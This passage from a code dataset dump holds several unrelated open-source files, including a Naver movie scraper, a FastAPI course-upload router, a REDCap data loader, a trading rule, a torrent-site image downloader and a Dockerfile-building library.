'builder.website.asset.item')\n model = self.env[self.env.context.get('active_model')].search([('id', '=', self.env.context.get('active_id'))])\n asset_item_model = self.env[asset_model_name]\n model_field = self.env.context.get('model_link_field', 'asset_id')\n asset_field = self.env.context.get('asset_field', 'file_id')\n\n for data_file in self.data_ids:\n current_file = self.env[asset_model_name].search([(model_field, '=', model.id), (asset_field, '=', data_file.id)])\n\n if not current_file.id:\n new_item = asset_item_model.create(dict(((model_field, model.id), (asset_field, data_file.id))))\n\n return {'type': 'ir.actions.act_window_close'}","repo_name":"f3ktr/BuilderOdooModule","sub_path":"builder/wizard/website_asset_bulk_add.py","file_name":"website_asset_bulk_add.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30207069955","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nclass Naver_movie(object):\n\n url = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\n class_code = ''\n driver_path = 'C:/Program Files/Google/Chrome/chromedriver'\n movie_title = []\n dict = {}\n df = None\n\n def scrap(self):\n driver = webdriver.Chrome(self.driver_path)\n driver.get(self.url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n all_div = soup.find_all('div', {\"class\": self.class_code})\n #for loop 사용, comprehention 사용\n for i in all_div:\n self.movie_title.append(i.find(\"a\").text)\n driver.close()\n\n def insert_dict(self):\n for i in range(0, len(self.movie_title)):\n self.dict[i+1] = self.movie_title[i]\n\n def insert_dataframe(self):\n self.df = pd.DataFrame.from_dict(self.dict, orient='index')\n print(self.df)\n\n def make_csv(self):\n path = './data/movieRanking.csv'\n self.df.to_csv(path, sep=',', na_rep='Nan')\n\n\nif __name__ == '__main__':\n naver = Naver_movie()\n naver.class_code = input(\"input tit3\")\n naver.scrap()\n naver.insert_dict()\n naver.insert_dataframe()\n naver.make_csv()","repo_name":"DJSull93/django-sull","sub_path":"webscrap/naver_movie.py","file_name":"naver_movie.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10147616314","text":"class Solution(object):\n def maxDotProduct(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: int\n \"\"\"\n dp = [[0 for _ in range(len(nums2) + 1)] for _ in range(len(nums1) + 1)]\n # m->nums1 n->nums2 DP[m][n] index count from 1\n\n for n in range(len(nums2) + 1):\n if n == 0:\n for mm in range(len(nums1) + 1):\n dp[mm][n] = -1000000\n else:\n opt = -1000000\n for m in range(len(nums1) + 1):\n if m == 0:\n dp[m][n] = -1000000\n continue\n\n dp[m][n]=max(dp[m - 1][n - 1] + nums1[m - 1] * nums2[n - 1],nums1[m - 1] * nums2[n - 1],dp[m - 1][n],dp[m][n - 1])\n\n\n\n\n\n return dp[len(nums1)][len(nums2)]\n\ns=Solution()\nprint(s.maxDotProduct([-5,-1,-2],[3,3,5,5]))","repo_name":"ElegyTsai/LeetCode-1st-round","sub_path":"1458. Max Dot Product of Two Subsequences.py","file_name":"1458. Max Dot Product of Two Subsequences.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22452929757","text":"import re\n\n# Use day_dict and is_leap_year in your tomorrow function\n\nday_dict ={ 1 : 31,\n 2 : 28,\n 3 : 31,\n 4 : 30,\n 5 : 31,\n 6 : 30,\n 7 : 31,\n 8 : 31,\n 9 : 30,\n 10 : 31, \n 11 : 30,\n 12 : 31} \n\ndef is_leap_year(year:int)->bool:\n return (year%4 == 0 and year%100 != 0) or year%400==0\n\ndef days_in(month:int,year:int)->int:\n return (29 if month==2 and is_leap_year(year) else day_dict[month])\n\n\ndef tomorrow(date:str)->str:\n pass\n\n\n\nif __name__ == '__main__':\n import driver, prompt,traceback\n while True:\n date = prompt.for_string('Enter a date to test (quit to start driver)')\n if date == 'quit':\n break;\n try:\n print('tomorrow=',tomorrow(date))\n except:\n print('tomorrow raised exception')\n traceback.print_exc()\n \n driver.driver()\n","repo_name":"ztza/Class-Projects","sub_path":"Python/Quizez/q2helper/q2solution.py","file_name":"q2solution.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36654868147","text":"from setuptools import find_packages, setup\n\nwith open(\"rl_kerning/__init__.py\") as f:\n for line in f:\n if line.find(\"__version__\") >= 0:\n version = line.split(\"=\")[1].strip()\n version = version.strip('\"')\n version = version.strip(\"'\")\n break\n\nwith open(\"README.md\") as f:\n readme = f.read()\n\nwith open(\"requirements.txt\") as f:\n requirements = f.readlines()\n\nwith open(\"requirements-dev.txt\") as f:\n requirements_dev = f.readlines()\n\nsetup_args = dict(\n name=\"rl_kerning\",\n version=version,\n description=\"HarfBuzz kerning / ligatures for Reportlab\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/gvellut/rl_kerning\",\n author=\"Guilhem Vellut\",\n author_email=\"g@vellut.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n \"Topic :: Printing\",\n ],\n keywords=\"reportlab pdf publishing book\",\n packages=find_packages(exclude=[\"docs\", \"tests\"]),\n install_requires=requirements,\n extras_require={\"dev\": requirements_dev},\n project_urls={\n \"Bug Reports\": \"https://github.com/gvellut/rl_kerning/issues\",\n \"Source\": \"https://github.com/gvellut/rl_kerning\",\n },\n)\n\nsetup(**setup_args)\n","repo_name":"gvellut/rl_kerning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11295315571","text":"from uuid import UUID\n\nfrom fastapi import (\n APIRouter,\n Body,\n Depends,\n File,\n HTTPException,\n UploadFile,\n)\n\nfrom modules.courses.schema import (\n CMICourseRead,\n CMICoursesBase,\n CMIEnrollementCreate,\n CMIEnrollementRead,\n)\nfrom modules.courses.service import CMICourseService, CourseDTO\nfrom modules.users.services import UserService\nimport logging\nfrom shared.utils import extract_zip\nfrom storage.storage import IStorage, LocalStorage\nfrom shutil import rmtree\nimport os.path\n\nlogger = logging.getLogger(__name__)\n\ncourses_router = APIRouter(tags=[\"courses\"], prefix=\"/api/courses\")\n\n\n@courses_router.post(\n \"\", response_model=CMICourseRead, name=\"courses:create_cmi5_course\"\n)\nasync def create_cmi5_course(\n title: str = Body(..., description=\"Course Title\"),\n description: str = Body(..., description=\"Course Description\"),\n file: UploadFile = File(...),\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n storage: IStorage = Depends(LocalStorage),\n):\n \"\"\"Create CMI5 Course\"\"\"\n\n content_type = \"\"\n\n if file.content_type in (\n \"application/zip\",\n \"application/octet-stream\",\n \"application/x-zip-compressed\",\n ):\n content_type = \"zip\"\n else:\n raise HTTPException(\n detail=\"Uploading Failed: Bad archive or file\",\n status_code=400,\n )\n\n folder_path = extract_zip(file)\n\n if content_type == \"zip\" and not os.path.exists(f\"{folder_path}/cmi5.xml\"):\n rmtree(folder_path)\n raise HTTPException(\n detail=\"Failed to retrieve course structure data from zip: not found cmi5.xml file\",\n status_code=400,\n )\n\n file_path = storage.save_course_folder(folder_path)\n\n data = CourseDTO(\n title=title,\n description=description,\n file_path=os.path.join(file_path, \"res/index.html\"),\n )\n\n course = await cmi_course_service.create(data)\n # delete local folder after uploading scorm course on s3 bucket\n rmtree(folder_path)\n return course\n\n\n@courses_router.get(\n \"/all\", response_model=list[CMICoursesBase], name=\"courses:get_cmi5_all_courses\"\n)\nasync def get_cmi5_all_courses(\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Get all courses\"\"\"\n\n courses = await cmi_course_service.get_all()\n\n return courses\n\n\n@courses_router.get(\n \"/{course_id}\", response_model=CMICourseRead, name=\"courses:get_cmi5_course\"\n)\nasync def get_cmi5_course(\n course_id: UUID,\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Get course with users by this course\"\"\"\n\n course = await cmi_course_service.get_by_id(course_id)\n\n if not course:\n raise HTTPException(detail=\"Курс не найден\", status_code=404)\n\n course = CMICourseRead.from_orm(course)\n course.users = await cmi_course_service.get_users(course)\n\n return course\n\n\n@courses_router.post(\n \"/enrollment\",\n name=\"courses:set_enrollment\",\n response_model=CMIEnrollementRead,\n)\nasync def set_enrollment(\n data: CMIEnrollementCreate,\n user_service: UserService = Depends(UserService),\n cmi_course_service: CMICourseService = Depends(CMICourseService),\n):\n \"\"\"Assign course on user\"\"\"\n course = await cmi_course_service.get_by_id(data.course_id)\n if not course:\n raise HTTPException(detail=\"Курс не найден\", status_code=404)\n\n user = await user_service.get_by_id(data.user_id)\n\n if not user:\n raise HTTPException(detail=\"Пользователь не найден\", status_code=404)\n\n enrollment = await cmi_course_service.get_enrollment(course.id, user.id)\n\n if enrollment:\n raise HTTPException(\n detail=\"Курс уже назначен на пользователя\",\n status_code=400,\n )\n\n enrollment = await cmi_course_service.set_enrollment(course, user)\n return enrollment\n","repo_name":"samuraii-company/cmi5-backend-demo-for-test","sub_path":"modules/courses/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13116488423","text":"import os\nimport io\nimport pandas as pd\nimport requests\nfrom ccf.box import CachedBox\nfrom ccf.easy_yaml import EasyYaml\nfrom ccf.redcap import CachedRedcap\nfrom ccf.config import LoadSettings\n\nconfig = LoadSettings()\n\nclass Loader:\n\n def __init__(self, name):\n self.name = name\n self.setup()\n\n def setup(self):\n \"\"\"\n Use this function to load data dictionaries or any other file that will\n aid in interpreting fields for creating shadow dataframes later on.\n \"\"\"\n pass\n\n def get_source_name(self):\n return self.name\n\n def _fields_hook_(self, fields):\n \"\"\"\n Use this function to add sepcial fields that are not explicitly\n described in the yaml map files. (names not renames)\n \"\"\"\n return fields\n\n def _load_hook_(self, fields):\n \"\"\"\n Implements the actual loading of the data.\n \"\"\"\n return pd.DataFrame()\n\n def _post_load_hook_(self, df):\n \"\"\"\n Manipulate the dataframe to create additional or rename existing fields.\n This is also a good place to merge additional data.\n \"\"\"\n filename = config['rosetta']['filename']\n rosetta=pd.read_csv(filename)\n rosetta = rosetta[['REDCap_id','subject', 'redcap_event','pseudo_guid', 'M/F', 'nda_interview_date', 'nda_age']]\n rosetta.columns = ['id','subject', 'redcap_event','subjectkey', 'gender', 'interview_date', 'interview_age']\n df = rosetta.merge(df, on=['subject','redcap_event'], suffixes=('', '_alt'))\n df['source'] = self.name\n\n return df\n\n def _detect_missing_fields_hook_(self, df, fields):\n \"\"\"\n Notify the user if any of the requested fields are missing or unavailable.\n \"\"\"\n diff = set(fields).difference(df.columns)\n if diff:\n print(self.name, 'Some columns were unavailable: ', diff)\n\n return diff\n\n def _create_shadow_dataframe(self, df, fields):\n \"\"\"\n Create a shadow dataframe which for example contains the text\n labels for coded fields.\n \"\"\"\n return df.copy(), df.copy()\n\n def load(self, fields):\n \"\"\"\n The main function that runs through all of the above functions in order.\n \"\"\"\n additional_fields = self._fields_hook_(fields)\n df = self._load_hook_(additional_fields)\n df = self._post_load_hook_(df)\n self._detect_missing_fields_hook_(df, fields)\n df, DF = self._create_shadow_dataframe(df, fields)\n df = df.replace('nan', pd.NA)\n DF = DF.replace('nan', '').fillna('')\n print('Shape of loaded data',df.shape)\n return df, DF\n\n\nclass BoxLoader(Loader):\n def __init__(self, name, boxid):\n self.boxid = boxid\n self.box = CachedBox(cache='./')\n super().__init__(name)\n\n def _load_hook_(self, fields):\n df = self.box.read_csv(self.boxid)\n return df\n\n def _post_load_hook_(self, df):\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['events']\n df = df[df.assessment.isin(fromnames)]\n df = df.rename(columns={\"subid\": \"subject\"})\n df['redcap_event']=df.assessment\n return super()._post_load_hook_(df)\n\n\nclass BoxHcdLoader(BoxLoader) :\n def _post_load_hook_(self, df):\n df = super()._post_load_hook_(df)\n df = df[df.subject.str.startswith('HCD', False)]\n return df\n\n\nclass BoxHcaLoader(BoxLoader) :\n def _post_load_hook_(self, df):\n df = super()._post_load_hook_(df)\n df = df[df.subject.str.startswith('HCA', False)]\n return df\n\n\nclass RedcapLoader(Loader):\n def __init__(self, name, definitions_dir=\"./definitions/\"):\n self.directory = definitions_dir\n self.definitions = {}\n super().__init__(name)\n\n def setup(self):\n filename = os.path.join(self.directory, self.name + '.yaml')\n Y = EasyYaml()\n self.definitions = Y(filename)\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n df = redcap.get_behavioral(self.get_source_name(), list(fields))\n renames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['event_names']\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['events']\n a = dict(zip(fromnames, renames))\n df[\"redcap_event\"] = df['redcap_event_name'].map(a)\n backfill = df.loc[df.redcap_event == 'V1'][['id', 'subject']] #only V1 has subject identifiers\n df = pd.merge(df.drop(columns='subject'), backfill, how='left', on='id')\n return df\n\n def _detect_missing_fields_hook_(self, df, fields):\n # Add checkbox fields\n extended_fieldslist = []\n for name in fields:\n d = self.definitions.get(name)\n if d and d['type'] == 'checkbox':\n extended_fieldslist.extend([f'{name}___{k}' for k, v in d['choices'].items()])\n else:\n extended_fieldslist.append(name)\n\n return super()._detect_missing_fields_hook_(df, extended_fieldslist)\n\n def _create_shadow_dataframe(self, df, fields):\n df = df.copy()\n DF = df.copy()\n\n for name in fields:\n if name not in self.definitions:\n # if not in data dictionary, then won't know how to manipulate so just skip\n continue\n\n field = self.definitions.get(name)\n\n if field['type'] == 'checkbox':\n replace_with_code = {f'{name}___{k}': k for k, v in field['choices'].items()}\n replace_with_value = {f'{name}___{k}': v for k, v in field['choices'].items()}\n\n z = df[replace_with_code.keys()].stack()\n z = z[z == 1].reset_index(level=1).rename(columns={'level_1': name}).drop(columns=0)\n\n x = z.replace(replace_with_value).groupby(level=0).agg(lambda values: '; '.join(values))\n X = z.replace(replace_with_code).groupby(level=0).agg(lambda values: '; '.join(values))\n\n elif name in df:\n x = df[name].copy()\n if field['type'] in ['radio', 'dropdown']:\n X = x.replace({float(k): v for k, v in field['choices'].items()})\n elif field['type'] in ['text']:\n X = x.astype(str)\n else:\n X = x.copy()\n else:\n x = pd.Series()\n X = pd.Series()\n df[name] = x\n DF[name] = X\n\n return df, DF\n\n\nclass ParentLoader(RedcapLoader):\n def __init__(self, name, definitions_dir=\"./definitions/\"):\n super().__init__('parent', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['child_id']\n\n def _post_load_hook_(self, df):\n df = df \\\n .drop(columns=['subjectid']) \\\n .rename(columns={'child_id': 'subjectid'})\n\n df[['subject', 'flagged']] = df.subjectid.str.split('_', 1, expand=True)\n\n # remove withdrawn\n df = df[df.flagged.isna()]\n\n return super()._post_load_hook_(df)\n\n\nclass QintLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('qint', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['subjectid', 'visit']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), fields)\n renames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['event_names']\n fromnames = LoadSettings()['Redcap']['datasources'][self.get_source_name()]['visit']\n a = dict(zip(list(map(str, fromnames)), renames))\n df[\"redcap_event\"] = df['visit'].map(a)\n return df\n\n def _post_load_hook_(self, df):\n visit = config['Redcap']['datasources'][self.get_source_name()]['visit']\n df = df[df.visit.isin(list(map(str, visit)))]\n df = df.rename(columns={\"subjectid\": \"subject\"})\n return super()._post_load_hook_(df)\n\n \nclass QintHcdLoader(QintLoader) :\n def _post_load_hook_(self, df):\n df = df[df.subjectid.str.startswith('HCD', False)]\n return super()._post_load_hook_(df)\n\n\nclass QintHcaLoader(QintLoader) :\n def _post_load_hook_(self, df):\n df = df[df.subjectid.str.startswith('HCA', False)]\n return super()._post_load_hook_(df)\n\n\nclass KsadsLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('ksads', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['patientid']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), list(fields))\n return df\n\n def _post_load_hook_(self, df):\n visit = config['visit']\n df = df[df.patientid.str.contains(\"V\"+visit)]\n df['subject']=df.patientid.str[:10]\n \n return super()._post_load_hook_(df)\n\n\nclass SsagaLoader(RedcapLoader):\n def __init__(self, definitions_dir=\"./definitions/\"):\n super().__init__('ssaga', definitions_dir)\n\n def _fields_hook_(self, fields):\n return fields + ['hcpa_id']\n\n def _load_hook_(self, fields):\n redcap = CachedRedcap()\n exclude = ['subject', 'subjectkey', 'gender', 'interview_date', 'interview_age']\n fields = [x for x in fields if x not in exclude]\n df = redcap(self.get_source_name(), list(fields))\n return df\n\n def _post_load_hook_(self, df):\n df = df.rename(columns={\"hcpa_id\": \"subject\"})\n return super()._post_load_hook_(df)\n","repo_name":"humanconnectome/NDA_submissions","sub_path":"Crosswalk/Loader.py","file_name":"Loader.py","file_ext":"py","file_size_in_byte":9923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8776092816","text":"import numpy as np\r\n\r\ndef ErrorCM(yd,yn):\r\n if len(yn[0])!=1:\r\n yn=np.array(yn)\r\n yd=np.array(yd)\r\n Err=yd-yn\r\n ET=np.sqrt(np.mean(Err**2)) \r\n return ET\r\n else:\r\n yn=np.array(yn)\r\n yd=np.array(yd)\r\n yn=yn.T\r\n yn=yn[0][0]\r\n Err=yd-yn\r\n ET=np.sqrt(np.mean(Err**2)) \r\n return ET\r\n \r\n ","repo_name":"jhonnier-t/Backpropagation-Red-Neuronal-General-Multicapa","sub_path":"ErrorCuadraticoMedio.py","file_name":"ErrorCuadraticoMedio.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"cy","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"29061393669","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom pathlib import PosixPath\nfrom typing import TYPE_CHECKING\n\nfrom .._formatters import format_shell_cmd, format_stage_name, json_if_spaces\nfrom ._base import BuildStep\n\n\nif TYPE_CHECKING:\n from typing import Literal\n\n from .._stage import Stage\n from .._types import BaseImage, Checksum, Mount\n\n\nclass ARG(BuildStep):\n \"\"\"\n Define a variable that users can pass at build-time to the builder with the `docker build`.\n\n The difference with ENV is that env vars set with ARG\n are not available in running container, only at build-time.\n\n https://docs.docker.com/engine/reference/builder/#arg\n \"\"\"\n __slots__ = ('name', 'default')\n\n def __init__(self, name: str, default: str | None = None) -> None:\n assert name\n self.name = name\n self.default = default\n\n def as_str(self) -> str:\n result = f'ARG {self.name}'\n if self.default is not None:\n result += f'={self.default}'\n return result\n\n\nclass RUN(BuildStep):\n \"\"\"Execute any commands in a new layer on top of the current image and commit the results.\n\n https://docs.docker.com/engine/reference/builder/#run\n \"\"\"\n __slots__ = ('first', 'rest', 'mount', 'network', 'security', 'shell')\n\n def __init__(\n self,\n first: str | list[str],\n *rest: str,\n mount: Mount | None = None,\n network: Literal['default', 'none', 'host'] = 'default',\n security: Literal['insecure', 'sandbox'] = 'sandbox',\n shell: bool = True,\n ) -> None:\n assert first\n if not shell and rest:\n raise ValueError('cannot use `shell=False` with multiple commands')\n self.first = first\n self.rest = rest\n self.mount = mount\n self.network = network\n self.security = security\n self.shell = shell\n\n def as_str(self) -> str:\n result = 'RUN'\n if self.mount is not None:\n result += f' --mount={self.mount}'\n if self.network != 'default':\n result += f' --network={self.network}'\n if self.security != 'sandbox':\n result += f' --security={self.security}'\n if isinstance(self.first, str) and self.rest:\n result += ' ' + ' && \\\\\\n '.join((self.first,) + self.rest)\n else:\n result += ' ' + format_shell_cmd(self.first, shell=self.shell)\n return result\n\n @property\n def min_version(self) -> str:\n if self.security != 'sandbox':\n return 'labs'\n if self.mount is not None:\n return '1.2'\n if self.network != 'default':\n return '1.1'\n return '1.0'\n\n\nclass ENV(BuildStep):\n \"\"\"Set an environment variable.\n\n The environment variables set using ENV will persist when a container\n is run from the resulting image.\n\n https://docs.docker.com/engine/reference/builder/#env\n \"\"\"\n __slots__ = ('key', 'value')\n\n def __init__(self, key: str, value: str) -> None:\n assert key\n self.key = key\n self.value = value\n\n def as_str(self) -> str:\n result = f'ENV {self.key}'\n value = self.value\n if not value or ' ' in value:\n value = f'\"{value}\"'\n result += f'={value}'\n return result\n\n\n@dataclass(repr=False)\nclass _BaseAdd(BuildStep):\n src: str | PosixPath | list[str | PosixPath]\n dst: str | PosixPath\n chown: str | int | None = None\n link: bool = False\n\n def as_str(self) -> str:\n result = ''\n if self.chown:\n result += f' --chown={self.chown}'\n if self.link:\n result += ' --link'\n parts = self._sources + [str(self.dst)]\n return f'{result} {json_if_spaces(parts)}'\n\n @property\n def _sources(self) -> list[str]:\n if isinstance(self.src, list):\n return [str(s) for s in self.src]\n return [str(self.src)]\n\n @property\n def min_version(self) -> str:\n if self.link:\n return '1.4'\n return '1.0'\n\n\n@dataclass\nclass DOWNLOAD(_BaseAdd):\n \"\"\"Download a remote file.\n\n https://docs.docker.com/engine/reference/builder/#add\n \"\"\"\n checksum: Checksum | None = None\n\n def as_str(self) -> str:\n result = 'ADD'\n if self.checksum:\n result += f' --checksum={self.checksum}'\n return f'{result}{super().as_str()}'\n\n @property\n def min_version(self) -> str:\n if self.checksum:\n return 'master-labs'\n return super().min_version\n\n\n@dataclass\nclass CLONE(_BaseAdd):\n \"\"\"Clone a git repository.\n\n Currently, available only in development channel. So, you'll need to explicitly\n specify the syntax to use this instruction::\n\n image = d.Image(\n stage,\n syntax_channel='docker/dockerfile-upstream',\n )\n\n https://docs.docker.com/engine/reference/builder/#adding-a-git-repository-add-git-ref-dir\n \"\"\"\n keep_git_dir: bool = False\n\n def as_str(self) -> str:\n result = 'ADD'\n if self.keep_git_dir:\n result += ' --keep-git-dir=true'\n return f'{result}{super().as_str()}'\n\n @property\n def min_version(self) -> str:\n return 'master-labs'\n\n\nclass EXTRACT(_BaseAdd):\n \"\"\"Extract an archive from the host machine into the image.\n\n Supported formats: identity, gzip, bzip2, and xz.\n\n https://docs.docker.com/engine/reference/builder/#add\n \"\"\"\n\n def as_str(self) -> str:\n return f'ADD{super().as_str()}'\n\n\n@dataclass\nclass COPY(_BaseAdd):\n \"\"\"\n Copies new files or directories from src and adds them to the filesystem\n of the image at the path dst.\n\n https://docs.docker.com/engine/reference/builder/#copy\n \"\"\"\n from_stage: Stage | BaseImage | None = None\n\n def as_str(self) -> str:\n result = 'COPY'\n if self.from_stage:\n result += f' --from={format_stage_name(self.from_stage)}'\n return f'{result}{super().as_str()}'\n\n\nclass USER(BuildStep):\n \"\"\"Set the user name to use as the default user for the remainder of the stage.\n\n https://docs.docker.com/engine/reference/builder/#user\n \"\"\"\n __slots__ = ('user', 'group')\n\n def __init__(self, user: str | int, group: str | int | None = None) -> None:\n self.user = user\n self.group = group\n\n def as_str(self) -> str:\n result = f'USER {self.user}'\n if self.group is not None:\n result += f':{self.group}'\n return result\n\n\nclass WORKDIR(BuildStep):\n \"\"\"\n Set the working directory for any RUN, CMD, ENTRYPOINT, COPY and ADD instructions that follow.\n\n If the path doesn't exist, it will be created.\n\n https://docs.docker.com/engine/reference/builder/#workdir\n \"\"\"\n __slots__ = ('path', )\n\n def __init__(self, path: str | PosixPath) -> None:\n assert path\n self.path = path\n\n def as_str(self) -> str:\n return f'WORKDIR {self.path}'\n\n\nclass ONBUILD(BuildStep):\n \"\"\"\n Add to the image a trigger instruction to be executed at a later time,\n when the image is used as the base for another build.\n\n https://docs.docker.com/engine/reference/builder/#onbuild\n \"\"\"\n __slots__ = ('trigger',)\n\n def __init__(self, trigger: BuildStep) -> None:\n assert not isinstance(trigger, ONBUILD), 'cannot use ONBUILD inside ONBUILD'\n self.trigger = trigger\n\n def as_str(self) -> str:\n return f'ONBUILD {self.trigger.as_str()}'\n\n\nclass SHELL(BuildStep):\n \"\"\"Override the default shell used for the shell form of commands.\n\n It affects shell form commands inside of RUN, CMD, and ENTRYPOINT instructions.\n\n https://docs.docker.com/engine/reference/builder/#shell\n \"\"\"\n __slots__ = ('cmd', )\n\n def __init__(self, cmd: str | list[str]) -> None:\n assert cmd\n self.cmd = cmd\n\n def as_str(self) -> str:\n return f'SHELL {format_shell_cmd(self.cmd, shell=False)}'\n","repo_name":"orsinium-labs/docked","sub_path":"docked/_steps/_build.py","file_name":"_build.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"16"} +{"seq_id":"15853122452","text":"class SellAtPrice(QCAlgorithm):\n\n def Initialize(self):\n\n self.SetCash(10000)\n\n self.SetStartDate(2010,1,1)\n\n self.SetEndDate(2020,1,1)\n\n \n\n self.apply = self.AddEquity(\"AAPL\",Resolution.Daily)\n\n \n\n self.limit_price = 50\n\n self.invest = True\n\n\n def OnData(self,data):\n\n if not self.Portfolio.Invested and self.invest:\n\n self.SetHoldings(\"AAPL\",1)\n\n closing_price = self.Portfolio['AAPL'].Price\n\n if closing_price > self.limit_price and self.Portfolio.Invested:\n\n self.Liquidate(\"AAPL\")\n\n self.invest = False","repo_name":"rkaelle/algo-trading-strategies","sub_path":"HardcodedSell.py","file_name":"HardcodedSell.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7407130206","text":"#! python3\n# -*- coding: UTF-8 -*-\n#coding: UTF-8\n#获取torrent的相关图片\n\nfrom bs4 import BeautifulSoup\nimport requests,queue,threading\n\nimgQueue = queue.Queue()\n\ndef getImg(imgLink='http://www.sinabt.com/B/BxeA7QN6.jpg',enable_proxy = False, proxy_string = {\"http\":\"127.0.0.1:8787\",\"https\":\"127.0.0.1:8787\",\"socks\":\"127.0.0.1:1080\"}):\n \"获取torrent的相关图片\"\n proxies = {}\n timeout = 15\n picFilename = ''\n \n picFilename = imgLink[imgLink.rfind('/')+1:len(imgLink)]\n\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'}\n try:\n r1 = requests.get(imgLink, headers = headers,proxies = proxies,timeout = timeout)\n #r1 = requests.get('http://www.jandown.com/fetch.php',params = formdata, headers = headers) #print的结果是b''���不知什么2进制意思,内容是否为空\n content = r1.content\n except Exception as e:\n print('error:',e)\n \n #print\n #print 'The real URL is: '\n #print response.geturl()\n #print\n #print 'The Response info is:'\n #info=response.info()\n #for key,value in info.items():\n # print \"%s = %s\" % (key,value)\n #print\n\n return picFilename,content\n\ndef getImgT(myQueue,outpath,enable_proxy = False, proxy_string = {\"http\":\"127.0.0.1:8787\",\"https\":\"127.0.0.1:8787\",\"socks\":\"127.0.0.1:1080\"}):\n \"获取torrent的相关图片\"\n proxies = {}\n timeout = 15\n picFilename = ''\n\n imgLink = myQueue.get_nowait()\n picFilename = imgLink[imgLink.rfind('/')+1:]\n\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'}\n try:\n r1 = requests.get(imgLink, headers = headers,proxies = proxies,timeout = timeout)\n imgContent = r1.content\n if len(imgContent) > 0:\n picFullpath = (outpath + r'/' + picFilename)\n ofile = open(picFullpath,'wb')\n ofile.write(imgContent)\n ofile.close()\n except Exception as e:\n print('error:',e)\n\ndef getImgs(imgList,outpath):\n for item in imgList:\n imgQueue.put(item)\n threadN = 10\n jqueue = imgQueue.qsize()\n if jqueue < threadN:\n threadN = jqueue\n\n threads = []\n for i in range(0,threadN):\n thread = threading.Thread(target = getImgT, args = (imgQueue,outpath,))\n threads.append(thread)\n thread.start()\n for thread1 in threads:\n thread1.join()\n\nif __name__ == '__main__':\n outfilename,imgContent = getImg()\n outfile = open(outfilename,'wb')\n outfile.write(imgContent)\n outfile.close()\n print(outfilename,' be saved')\n","repo_name":"whatrye/getAiBT","sub_path":"getImg.py","file_name":"getImg.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17647099595","text":"import numpy as np\n\n#%%\ndef isNestedList(input):\n '''\n Check if a list is nested or not.\n '''\n # Assert that the input is a list\n assert isinstance(input, list), 'Input is not a list'\n \n # Convert to numpy array\n arr = np.array(input)\n \n return bool(arr.ndim>1)\n\n#%%\ndef vec2angle(v1, v2, unit='radian'):\n '''\n It calculates angle between two vectors.\n \n Input\n --------\n v1: vector 1. Example: [10, 20, 30]\n v2: vector 2. Example: [30, 20, 40]\n unit: Either radian or degree\n \n Output\n --------\n angle: Angle between two vectors\n \n Example\n --------\n v1 = [10, 20, 10]\n v2 = [20, 40, 30]\n \n angle = vec2angle(v1, v2, unit='degree')\n\n '''\n unit_v1 = v1 / 